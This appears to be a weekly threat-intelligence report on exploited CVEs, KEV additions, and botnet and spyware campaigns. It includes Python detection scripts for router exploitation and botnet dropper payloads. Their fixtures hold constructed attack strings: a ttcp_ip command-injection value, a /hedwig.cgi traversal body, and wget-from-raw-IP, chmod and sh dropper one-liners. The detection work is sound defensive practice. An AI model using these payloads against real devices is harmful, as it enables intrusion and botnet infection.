Exploits Escalate: KEV Inclusions, Botnet Activity, and Malware Campaigns

June 27, 2025
Executive Summary
Trending / Critical Vulnerabilities
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Vulnerabilities abused by Botnet
Vulnerabilities Abused by Malware
PRE-NVD observed for this week
External References
Subscribe to our Reports

Executive Summary

This week's cybersecurity landscape witnessed a surge in both opportunistic and advanced threat activity. CISA added three high-impact vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: a path traversal flaw in legacy D-Link DIR-859 routers, a critical authentication bypass in AMI MegaRAC SPx's Redfish Host Interface, and a long-standing hardcoded credentials vulnerability in Fortinet FortiOS previously leveraged by the Akira ransomware group. Several other vulnerabilities are under active exploitation, including a privilege escalation flaw in the Motors WordPress theme, a memory overflow bug in Citrix NetScaler ADC/Gateway, and a zero-auth OS command injection in Linksys E-Series routers.

Simultaneously, botnet-driven exploitation campaigns intensified, with threat actors deploying malware families such as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st to target unpatched vulnerabilities in platforms like GitLab, Spring Cloud Gateway, and various PHP services. IoT botnets including Bashlite, BrickerBot, Tsunami, and Mirai also escalated attacks on Eir D1000 modems, rapidly infecting internet-facing devices.

On the advanced threat front, state-sponsored and surveillance-driven intrusions made headlines. The Canadian Centre for Cyber Security and the FBI issued a joint advisory linking China-backed Salt Typhoon to ongoing exploitation of a two-year-old vulnerability in the Cisco IOS XE web UI. Meanwhile, an OS Command Injection Vulnerability in Linksys E-Series routers is actively being exploited by the self-propagating TheMoon worm. Additionally, Meta-owned WhatsApp confirmed to SecurityWeek that CVE-2025-27363, an out-of-bounds write flaw in FreeType, was tied to spyware activity linked to the Israeli firm Paragon.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping defenders make informed prioritization decisions.

CVE-2025-4322
An Unauthenticated Privilege Escalation Vulnerability in the popular Motors WordPress theme poses a critical risk to website security, with a CVSS Score of 9.8. Affecting all versions up to and including 5.6.67, this flaw enables remote attackers to reset passwords and gain full administrative access to WordPress sites without authentication. If exploited, threat actors can perform complete site takeovers, deploy malicious plugins or persistent backdoors, and operate with stealth, often leaving minimal forensic evidence unless detailed logging is in place. According to Wordfence, more than 23,100 attack attempts have been blocked by its firewall, highlighting the active exploitation of this vulnerability. To mitigate risk, site administrators are strongly urged to update to version 5.6.68, which contains the official patch.

CVE-2025-6543
A Memory Overflow Vulnerability in Citrix NetScaler ADC and NetScaler Gateway could lead to unintended control flow and denial of service, with a critical CVSS score of 9.2. This vulnerability has been exploited in the wild, prompting Citrix to release urgent security patches. While the exact exploitation techniques remain undisclosed, Citrix confirmed that attacks on unpatched appliances have been observed. Successful exploitation requires the appliance to be configured in Gateway mode (VPN virtual server, ICA Proxy, CVPN, or RDP Proxy) or as an AAA virtual server. Customers are strongly advised to upgrade to the recommended NetScaler builds immediately to mitigate the risk.

CVE-2025-34037
An Unauthenticated OS Command Injection Vulnerability in the Linksys E-Series routers has been rated critical with a CVSS Score of 10.0, allowing remote attackers to execute arbitrary shell commands without any authentication. The flaw resides in the /tmUnblock.cgi and /hndUnblock.cgi CGI endpoints, where input to the ttcp_ip parameter is improperly sanitized, leading to direct command execution on the underlying system. According to the SANS Technology Institute, this vulnerability is being actively exploited and may impact other Linksys models, including the WAG, WAP, WES, WET, WRT series, as well as Wireless-N access points and routers. As of now, no official patch or firmware update has been released by Linksys. Organizations are strongly advised to restrict access to port 8080, implement external firewall rules, and monitor for suspicious network activity indicative of exploitation attempts.

CVE-2024-0769
A Path Traversal Vulnerability has been identified in the D-Link DIR-859 router, specifically within the /hedwig.cgi HTTP POST request handler. The flaw is rated critical with a CVSS Score of 9.8 and affects firmware version 1.06B01. All associated hardware versions have reached End-of-Life (EoL) and are no longer supported. Attackers are actively exploiting the flaw by sending malicious POST requests to /hedwig.cgi, using the fatlady.php file to access sensitive configuration files like getcfg, potentially exposing user credentials. This can allow full device compromise, and the vulnerability has been recently added to CISA’s KEV catalog. D-Link recommends retiring and replacing all affected devices.
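The Linksys (CVE-2025-34037) and D-Link (CVE-2024-0769) entries above both describe exploitation through a specific CGI endpoint and request parameter, which makes them easy to watch for in web-server or sensor request logs. The following Python is an added detection example, not code from this report or from Loginsoft's Cytellite sensors: it inspects constructed HTTP request records and flags requests to /tmUnblock.cgi or /hndUnblock.cgi whose ttcp_ip value carries shell metacharacters, and POST requests to /hedwig.cgi whose parameters mention fatlady.php, getcfg, or a ../ traversal sequence. The request records, source addresses, and the marker list are assumptions made for illustration.

```python
"""Added example: flag requests matching the CVE-2025-34037 (Linksys ttcp_ip
command injection) and CVE-2024-0769 (D-Link /hedwig.cgi path traversal)
patterns described in the report. Request records below are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Characters that terminate or chain a shell command; none of them belong in
# an IP-address field such as ttcp_ip.
SHELL_META = re.compile(r"[;&|`$(){}<>\r\n]")
# Strings the report associates with CVE-2024-0769 requests to /hedwig.cgi,
# plus the generic traversal sequence (assumed markers, not an exhaustive list).
HEDWIG_MARKERS = ("fatlady.php", "getcfg", "../")


def inspect_request(method, target, body=""):
    """Return the CVE identifiers whose detection rule matches one request."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, vals in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(vals)
    hits = []
    if path in ("/tmUnblock.cgi", "/hndUnblock.cgi"):
        # parse_qs already URL-decoded once; decode again to catch double encoding.
        if any(SHELL_META.search(unquote(v)) for v in params.get("ttcp_ip", [])):
            hits.append("CVE-2025-34037")
    if method.upper() == "POST" and path == "/hedwig.cgi":
        haystack = unquote(parts.query + "&" + body).lower()
        if any(marker in haystack for marker in HEDWIG_MARKERS):
            hits.append("CVE-2024-0769")
    return hits


# Constructed request records: (source address, method, target, body).
SAMPLE_REQUESTS = [
    ("198.51.100.7", "POST", "/tmUnblock.cgi",
     "ttcp_num=2&ttcp_size=2&ttcp_ip=192.0.2.1%3Becho+probe&StartEPI=1"),
    ("198.51.100.7", "GET", "/hndUnblock.cgi?ttcp_ip=192.0.2.1%7Cecho+x", ""),
    ("203.0.113.9", "POST", "/hedwig.cgi", "service=..%2F..%2Ffatlady.php"),
    ("192.0.2.44", "POST", "/tmUnblock.cgi", "ttcp_ip=192.0.2.10"),  # benign
    ("192.0.2.44", "GET", "/index.html", ""),                         # benign
]


def scan(requests=SAMPLE_REQUESTS):
    """Map each source address to the set of rules its requests triggered."""
    findings = {}
    for src, method, target, body in requests:
        for rule in inspect_request(method, target, body):
            findings.setdefault(src, set()).add(rule)
    return findings


if __name__ == "__main__":
    for src, rules in scan().items():
        print(src, sorted(rules))
```

The ttcp_ip rule deliberately keys on metacharacters rather than on any particular command, since the field should only ever hold an address; the /hedwig.cgi rule is limited to POST because that is the handler the report names. Both rules need access to request bodies, so they belong on a reverse proxy, WAF, or full-packet sensor rather than on a plain access log that records only the request line.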

CVE-2024-54085
An Authentication Bypass by Spoofing Vulnerability in the AMI MegaRAC SPx Redfish Host Interface has been rated critical with a CVSS Score of 10.0, posing severe risks to system confidentiality, integrity, and availability. AMI released a security advisory in March 2025, addressing the flaw in SPx versions 12.7+ and 13.5. According to Eclypsium, this vulnerability can be exploited by both local and remote attackers via the Redfish management interface or internal host access to the BMC. Successful exploitation enables full remote control of the compromised server, including the ability to deploy malware and conduct firmware tampering. The flaw has been recently added to CISA's Known Exploited Vulnerabilities (KEV) catalog, highlighting the urgency for immediate remediation.

CVE-2019-6693
A Use of Hard-Coded Credentials Vulnerability has been identified in Fortinet FortiOS, allowing attackers to decrypt sensitive data in configuration backup files by leveraging a known hardcoded key. The issue is rated medium severity on the CVSS scale and affects FortiOS versions 6.2.0, 6.0.0 to 6.0.6, and 5.6.10 and below. Starting with FortiOS versions 5.6.11, 6.0.7, and 6.2.1, administrators are given the option to use a password to encrypt sensitive configuration data, mitigating the risk. This vulnerability has been historically exploited by the Akira ransomware group for initial access and was recently added to the CISA KEV catalog, emphasizing the need for immediate upgrades.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

| Vulnerability | Product | Severity | Title | Exploited in-the-wild | CISA KEV |
| --- | --- | --- | --- | --- | --- |
| CVE-2024-47176 | CUPS | Medium | Improper Input Validation Vulnerability in OpenPrinting CUPS browsed through 2.0.1 leads to remote code execution | True | False |
| CVE-2024-4577 | PHP-CGI on Windows | High | Critical Argument Injection Vulnerability in PHP on Windows servers | True | True |
| CVE-2024-3721 | TBK DVR Devices | Medium | OS Command Injection Vulnerability in TBK DVR-4104 and DVR-4216 up to 20240412 | False | False |
| CVE-2024-3400 | Palo Alto Networks PAN-OS | Critical | Command Injection Vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS | True | True |
| CVE-2024-1709 | ConnectWise ScreenConnect | Critical | Authentication Bypass Vulnerability in ConnectWise ScreenConnect through 23.9.7 leads to sensitive information disclosure | True | True |
| CVE-2023-4966 | NetScaler ADC and Gateway | Critical | Buffer overflow vulnerability in NetScaler ADC and NetScaler Gateway leads to sensitive information disclosure | True | True |
| CVE-2023-2245 | HansunCMS | Critical | Unrestricted file upload vulnerability in hansunCMS 1.4.3 | False | True |
| CVE-2023-38646 | Metabase open source and Enterprise | Critical | Remote Code Execution Vulnerability in Metabase open source and Metabase Enterprise | True | False |
| CVE-2023-24488 | Citrix ADC and Citrix Gateway | Medium | Cross Site Scripting Vulnerability in Citrix ADC and Citrix Gateway | True | False |
| CVE-2023-26801 | LB-LINK | Critical | Command Injection Vulnerability in LB-LINK devices | True | False |

Vulnerabilities abused by Botnet

This section lists vulnerabilities exploited by botnets, including recent CVEs logged in MISP, and presents the top 5 CVEs whose payloads are suggestive of botnet activity, such as fetching binaries with wget from raw IP addresses.

| Vulnerability | Product | Title | Exploit | Abused by Botnet |
| --- | --- | --- | --- | --- |
| CVE-2022-22947 | Spring Cloud Gateway | Remote Code Execution Vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K |
| CVE-2021-22205 | Gitlab-Exiftool | Remote Code Execution Vulnerability in Gitlab-Exiftool | True | Andoryu |
| CVE-2017-9841 | Util/PHP/eval-stdin.php in PHPUnit | Arbitrary PHP Code Execution Vulnerability in Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 | True | AndroxGh0st |
| CVE-2016-10372 | Eir D1000 modem | Improper Protocol Access Control Vulnerability in Eir D1000 modem | True | Bashlite, BrickerBot, Tsunami, Mirai |
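The botnet table above is selected on payload shape, for example wget pointed at an IP address, rather than on the CVE alone. As an added example, not code from this report or from Loginsoft's vulnerability intelligence platform, the Python below splits a decoded payload into the commands it chains together and scores the classic dropper pattern: a fetch tool aimed at a raw IPv4 literal, followed by marking the file executable and running it. The payloads, addresses, and indicator names are constructed for illustration and reference no real infrastructure.

```python
"""Added example: score a decoded request payload for the dropper pattern the
report associates with botnet activity (a fetch tool pointed at a raw IPv4
address, followed by marking the file executable and running it).
Payloads below are constructed; no real botnet infrastructure is referenced."""
import re
from ipaddress import ip_address
from urllib.parse import unquote

FETCHERS = {"wget", "curl", "tftp", "ftpget"}
# Split a shell one-liner into the commands it chains together.
SEGMENT_SPLIT = re.compile(r"\s*(?:;|&&|\|\||\||\n)\s*")
IPV4 = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def ipv4_literals(text):
    """Return the syntactically valid IPv4 literals found in text."""
    found = []
    for m in IPV4.finditer(text):
        try:
            found.append(str(ip_address(m.group(1))))
        except ValueError:  # e.g. 999.1.1.1 matches the regex but is not an address
            pass
    return found


def analyse_payload(payload):
    """Return (indicator set, download hosts) for one payload string."""
    indicators, hosts = set(), set()
    for segment in SEGMENT_SPLIT.split(unquote(payload)):
        tokens = segment.split()
        if not tokens:
            continue
        cmd = tokens[0].rsplit("/", 1)[-1]          # /usr/bin/wget -> wget
        if cmd == "busybox" and len(tokens) > 1:     # busybox wget ... -> wget
            cmd = tokens[1]
        if cmd in FETCHERS:
            ips = ipv4_literals(segment)
            indicators.add("fetch_from_raw_ip" if ips else "fetch")
            hosts.update(ips)
        elif cmd == "chmod" and any(t in ("777", "755") or t.startswith("+x") for t in tokens[1:]):
            indicators.add("mark_executable")
        elif cmd in ("sh", "bash") or tokens[0].startswith("./"):
            indicators.add("execute_dropped")
        elif cmd == "rm" and "-rf" in tokens:
            indicators.add("cleanup")
    return indicators, hosts


def is_botnet_like(payload):
    """A fetch from a raw IP plus a chmod or execution step is the dropper signature."""
    indicators, _ = analyse_payload(payload)
    return "fetch_from_raw_ip" in indicators and bool(
        indicators & {"mark_executable", "execute_dropped"})


# Constructed payloads as a sensor might log them after URL decoding.
SAMPLE_PAYLOADS = [
    "cd /tmp; wget http://192.0.2.50/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh",
    "busybox wget http://198.51.100.23/x.sh -O- | sh",
    "curl -s https://updates.example.com/agent.tgz | tar xz",  # named host, no chmod/exec
    "cat /etc/hostname",                                       # not a download at all
]


def flagged_hosts(payloads=SAMPLE_PAYLOADS):
    """Sorted download hosts seen in payloads that match the dropper signature."""
    hosts = set()
    for payload in payloads:
        if is_botnet_like(payload):
            hosts.update(analyse_payload(payload)[1])
    return sorted(hosts)


if __name__ == "__main__":
    for payload in SAMPLE_PAYLOADS:
        print(is_botnet_like(payload), sorted(analyse_payload(payload)[0]), payload)
    print("download hosts to investigate:", flagged_hosts())
```

Requiring both the raw-IP fetch and a follow-on chmod or execution step keeps ordinary package or update downloads from a named host out of the result set; the hosts returned by flagged_hosts are the values worth enriching against threat intelligence or adding to egress block lists.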

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually analyzed and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.

CVE-2023-20198
The Canadian Centre for Cyber Security and FBI have jointly issued a warning about cyberattacks by Chinese state-sponsored group Salt Typhoon, targeting telecommunications companies in Canada. Known for espionage campaigns against major telecom providers globally, Salt Typhoon has reportedly exfiltrated call detail records and sensitive communications of high-value individuals, including government personnel and political figures. The threat actors exploited the vulnerability CVE-2023-20198 to access running configuration files from multiple network devices and, in at least one instance, modified a file to create a GRE tunnel, enabling them to intercept and collect network traffic for surveillance purposes.

CVE-2025-34037
An OS Command Injection Vulnerability in the Linksys E-Series routers is being actively exploited in the wild by a self-replicating malware known as the TheMoon worm, according to research from the SANS Technology Institute. The worm primarily displays the characteristics of an autonomous propagation threat, though indicators within its binary suggest the potential presence of a command-and-control (C2) mechanism, raising concerns that it could be weaponized into a full-fledged botnet at any time.

CVE-2025-27363
An Out-of-Bounds Write Vulnerability in FreeType, CVE-2025-27363, has been linked to exploitation by the Israeli surveillance vendor Paragon, according to Meta-owned WhatsApp in a statement to SecurityWeek. Initially flagged in mid-March through a Meta advisory as an out-of-bounds write flaw in the FreeType open-source library, the vulnerability could lead to arbitrary code execution and was suspected to be exploited in the wild. By early May, it was patched in Android and added to the CISA KEV catalog. While no technical details were publicly disclosed at that time, WhatsApp recently confirmed to SecurityWeek that its own researchers had requested the CVE after connecting it to an exploit used by Paragon's Graphite spyware. The Citizen Lab had earlier reported that a WhatsApp zero-day was abused by Paragon through malicious PDF files shared in group chats, which was mitigated via a server-side patch without requiring client-side updates.

| Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS |
| --- | --- | --- | --- | --- | --- |
| CVE-2023-20198 | Critical | A Privilege Escalation Vulnerability in the Cisco IOS XE Web UI | Yes | Salt Typhoon | False |
| CVE-2025-34037 | Critical | An OS Command Injection Vulnerability in E-Series Linksys routers | No | TheMoon | False |
| CVE-2025-27363 | High | An Out-of-Bounds Write Vulnerability in the FreeType font rendering library | Yes | Graphite Spyware | True |

PRE-NVD observed for this week

PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.

| CVE-ID | Type of vulnerability | Product | Reference |
| --- | --- | --- | --- |
| CVE-2025-6019 | Privilege Escalation | Linux Distributions | Resource |
| CVE-2025-22234 | Information Disclosure | Spring Security BCryptPasswordEncoder | Resource |
| CVE-2025-26458 | Local Privilege Escalation | Android Framework | Resource |
| CVE-2025-30199 | Download of Code Without Integrity Check | ECOVACS DEEBOT Vacuum and Base Station | Resource |
| CVE-2025-47188 | Command Injection | Mitel Multiple Products | Resource |

External References

  1. https://www.cisa.gov/news-events/alerts/2025/06/16/cisa-adds-two-known-exploited-vulnerabilities-catalog  
  2. https://www.cisa.gov/news-events/alerts/2025/06/17/cisa-adds-one-known-exploited-vulnerability-catalog
  3. https://www.greynoise.io/blog/exploit-attempts-targeting-zyxel-cve-2023-28771
  4. https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin
  5. https://citizenlab.ca/2025/06/first-forensic-confirmation-of-paragons-ios-mercenary-spyware-finds-journalists-targeted/
  6. https://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html  
